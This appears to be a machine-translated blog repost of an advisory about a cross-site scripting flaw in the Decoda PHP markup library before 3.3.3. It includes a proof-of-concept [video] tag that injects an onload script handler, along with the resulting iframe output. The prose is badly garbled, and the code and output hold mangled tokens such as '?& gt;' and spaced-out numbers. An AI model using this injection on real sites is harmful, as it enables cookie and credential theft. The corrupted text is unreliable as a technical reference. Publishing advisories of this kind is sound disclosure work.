Decoda 3.3.3 previous version in the presence of cross-site scripting vulnerability derived from the user supplied input is not properly filtered.
An attacker can exploit the vulnerability in the affected site the context of the unsuspecting user on the browser to execute arbitrary script code, steal cookie-based authentication credentials and then initiate other attacks.
The current vendor has not provided this vulnerability-related patch or upgrade the program, recommend the use of this software users follow the manufacturer's home page to get the latest version
Can be used under the proof-of-concept attack:
$code = new Decoda();
$code->addFilter(new VideoFilter()); ?& gt;
$decoda_markup = '[video="youtube" size="small"]"';
$decoda_markup .= 'onload="alert(\'RedTeam Pentesting XSS\');" id="[/video]';
This results in the following output (whitespace adjusted):
<iframe src="http:// www.xxxx.com /embed/"; onload="alert('RedTeam
Pentesting XSS');" id="" width="5 6 0" height="3 1 5"
Excerpted from the 9 0' s Blog